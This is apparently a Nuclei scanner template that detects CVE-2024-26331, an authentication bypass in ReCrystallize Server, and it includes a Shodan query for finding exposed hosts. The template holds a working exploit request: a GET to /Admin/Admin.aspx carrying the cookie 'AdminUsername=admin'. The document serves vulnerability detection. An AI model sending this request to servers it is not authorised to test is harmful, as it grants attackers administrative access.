43 lines
1.6 KiB
YAML
43 lines
1.6 KiB
YAML
id: CVE-2024-26331
|
|
|
|
info:
|
|
name: ReCrystallize Server - Authentication Bypass
|
|
author: Carson Chan
|
|
severity: high
|
|
description: |
|
|
This vulnerability allows an attacker to bypass authentication in the ReCrystallize Server application by manipulating the 'AdminUsername' cookie. This gives the attacker administrative access to the application's functionality, even when the default password has been changed.
|
|
reference:
|
|
- https://preview.sensepost.com/blog/2024/from-discovery-to-disclosure-recrystallize-server-vulnerabilities/
|
|
- https://sensepost.com/blog/2024/from-discovery-to-disclosure-recrystallize-server-vulnerabilities/
|
|
- https://www.recrystallize.com/merchant/ReCrystallize-Server-for-Crystal-Reports.htm
|
|
- https://github.com/Ostorlab/KEV
|
|
classification:
|
|
epss-score: 0.00053
|
|
epss-percentile: 0.21091
|
|
metadata:
|
|
verified: true
|
|
max-request: 1
|
|
shodan-query: title:"ReCrystallize"
|
|
tags: cve,recrystallize,auth-bypass,cve2024
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/Admin/Admin.aspx"
|
|
headers:
|
|
Cookie: "AdminUsername=admin"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- "ReCrystallize Server Administration"
|
|
- "License Status:"
|
|
- "System Info</a>"
|
|
condition: and
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
# digest: 4a0a00473045022100f68e3fc7dd7b10c2e71a77cc24fb7a99e1a6e4ff9d5b86e7c9b25e7f5575187f02206926e5e7531aec461b57177090c9496406e951fd6da19bdaec5812315f77730f:922c64590222798bb761d5b6d8e72950 |